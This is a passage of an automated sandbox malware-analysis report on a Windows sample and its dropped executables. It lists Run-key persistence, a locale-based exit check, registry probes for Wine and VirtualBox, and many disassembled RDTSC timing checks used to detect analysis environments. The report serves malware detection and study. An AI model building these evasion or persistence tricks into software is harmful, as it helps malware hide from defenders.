Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d27375200a.exe	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

11_2_004195E0

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\d27375200a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: A5F0C9 second address: A5F0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: A5F0D7 second address: A5F0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71A4 second address: BD71AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71AE second address: BD71E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FC9D915F4B6h 0x0000000d popad 0x0000000e push edi 0x0000000f jmp 00007FC9D915F4C4h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b jns 00007FC9D915F4B6h 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71E2 second address: BD71F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jnl 00007FC9D8BCC166h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD71F0 second address: BD7203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007FC9D915F4C2h 0x0000000b je 00007FC9D915F4B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD6349 second address: BD636A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC16Bh 0x0000000d jmp 00007FC9D8BCC16Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD636A second address: BD6370 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD6370 second address: BD6375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD6375 second address: BD637B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD64D8 second address: BD64F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC9D8BCC172h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD64F6 second address: BD651B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C4h 0x00000009 js 00007FC9D915F4B6h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD651B second address: BD6522 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD676E second address: BD6778 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC9D915F4BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD8F63 second address: BD8FBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FC9D8BCC170h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC9D8BCC168h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b cld 0x0000002c push 00000000h 0x0000002e push 21430882h 0x00000033 jc 00007FC9D8BCC189h 0x00000039 push eax 0x0000003a push edx 0x0000003b js 00007FC9D8BCC166h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD9243 second address: BD9248 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD9248 second address: BD9272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor dword ptr [ebp+122D1EF0h], ebx 0x0000000e push 00000000h 0x00000010 cld 0x00000011 or edx, 14B2F200h 0x00000017 call 00007FC9D8BCC169h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnp 00007FC9D8BCC168h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD9272 second address: BD92DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FC9D915F4B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC9D915F4BEh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FC9D915F4C8h 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e jmp 00007FC9D915F4C4h 0x00000023 push eax 0x00000024 push edx 0x00000025 pop edx 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jbe 00007FC9D915F4C3h 0x00000034 jmp 00007FC9D915F4BDh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD92DE second address: BD92E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD939F second address: BD93C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edx 0x00000009 jnc 00007FC9D915F4B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC9D915F4BBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD93C2 second address: BD93C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD93C8 second address: BD940F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC9D915F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC9D915F4B8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 add edx, dword ptr [ebp+122D2C31h] 0x0000002d lea ebx, dword ptr [ebp+1244DE5Ch] 0x00000033 mov edi, eax 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pushad 0x0000003a popad 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BAE second address: BF7BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC9D8BCC166h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BB9 second address: BF7BCF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FC9D915F4B6h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BCF second address: BF7BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC9D8BCC166h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7BE2 second address: BF7C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FC9D915F4B6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF7D85 second address: BF7D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FC9D8BCC166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8051 second address: BF8059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF84BB second address: BF84BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF84BF second address: BF84D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC9D915F4C0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF877F second address: BF8793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC9D8BCC166h 0x0000000a jng 00007FC9D8BCC166h 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8793 second address: BF87B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C9h 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8923 second address: BF8929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8929 second address: BF8947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FC9D915F4C1h 0x0000000a js 00007FC9D915F4BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8947 second address: BF8958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FC9D8BCC166h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8958 second address: BF895E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF895E second address: BF8972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FC9D8BCC16Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8AEC second address: BF8B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CA1 second address: BF8CBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FC9D8BCC166h 0x00000009 jmp 00007FC9D8BCC16Ah 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FC9D8BCC166h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CBF second address: BF8CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CC3 second address: BF8CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CD0 second address: BF8CDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF8CDD second address: BF8CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FC9D8BCC166h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BD0484 second address: BD048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF9376 second address: BF9387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF97BA second address: BF97D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: BF9A6B second address: BF9A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C00864 second address: C00869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C00869 second address: C0086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03734 second address: C0376E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC9D915F4C9h 0x0000000e jc 00007FC9D915F4BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0388F second address: C03893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03893 second address: C038AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC9D915F4C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03A03 second address: C03A09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C03B61 second address: C03B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9D915F4BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C04022 second address: C0403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC9D8BCC166h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC9D8BCC16Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0403B second address: C04047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007FC9D915F4B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0583C second address: C05849 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05849 second address: C0584D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0584D second address: C05851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05851 second address: C05890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC9D915F4CCh 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC9D915F4C4h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05890 second address: C0589E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C0589E second address: C058B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC9D915F4B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jno 00007FC9D915F4B8h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C058B8 second address: C0591C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jno 00007FC9D8BCC168h 0x00000011 jmp 00007FC9D8BCC177h 0x00000016 popad 0x00000017 pop eax 0x00000018 jp 00007FC9D8BCC171h 0x0000001e jnp 00007FC9D8BCC16Bh 0x00000024 push E8B1B19Bh 0x00000029 pushad 0x0000002a jmp 00007FC9D8BCC175h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC9D8BCC16Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05A20 second address: C05A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC9D915F4BEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: C05DA3 second address: C05DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
